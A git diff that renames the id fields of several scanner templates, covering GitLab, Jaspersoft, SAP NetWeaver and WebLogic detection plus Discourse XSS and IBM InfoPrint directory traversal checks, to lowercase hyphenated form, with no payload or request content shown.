diff --git a/technologies/gitlab-detect.yaml b/technologies/gitlab-detect.yaml index 816fcf390d..5aff27ac1e 100644 --- a/technologies/gitlab-detect.yaml +++ b/technologies/gitlab-detect.yaml @@ -1,4 +1,4 @@ -id: Gitlab-Detect +id: gitlab-detect info: name: Detect Gitlab diff --git a/technologies/jaspersoft-detect.yaml b/technologies/jaspersoft-detect.yaml index 9ab5bc3a91..7cafc9a84d 100644 --- a/technologies/jaspersoft-detect.yaml +++ b/technologies/jaspersoft-detect.yaml @@ -1,4 +1,4 @@ -id: Jaspersoft-detect +id: jaspersoft-detect info: name: Jaspersoft detected diff --git a/technologies/sap-netweaver-detect.yaml b/technologies/sap-netweaver-detect.yaml index a1dcdfc77a..631dd2667f 100644 --- a/technologies/sap-netweaver-detect.yaml +++ b/technologies/sap-netweaver-detect.yaml @@ -1,4 +1,4 @@ -id: SAP-Netweaver-Detect +id: sap-netweaver-detect info: name: SAP NetWeaver Detect author: rakeshmane10 diff --git a/technologies/weblogic-detect.yaml b/technologies/weblogic-detect.yaml index 5242170285..704b159c7c 100644 --- a/technologies/weblogic-detect.yaml +++ b/technologies/weblogic-detect.yaml @@ -1,4 +1,4 @@ -id: WebLogic-Detect +id: weblogic-detect info: name: Detect Weblogic diff --git a/vulnerabilities/discourse-xss.yaml b/vulnerabilities/discourse-xss.yaml index ddc26121c9..094cdfe7d1 100644 --- a/vulnerabilities/discourse-xss.yaml +++ b/vulnerabilities/discourse-xss.yaml @@ -1,4 +1,4 @@ -id: Discourse XSS +id: discourse-xss info: name: Discourse CMS - XSS diff --git a/vulnerabilities/ibm-infoprint-directory-traversal.yaml b/vulnerabilities/ibm-infoprint-directory-traversal.yaml index d80eaf0ea7..f9d3494560 100644 --- a/vulnerabilities/ibm-infoprint-directory-traversal.yaml +++ b/vulnerabilities/ibm-infoprint-directory-traversal.yaml @@ -1,4 +1,4 @@ -id: IBM InfoPrint Directory Traversal +id: ibm-infoprint-directory-traversal info: name: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal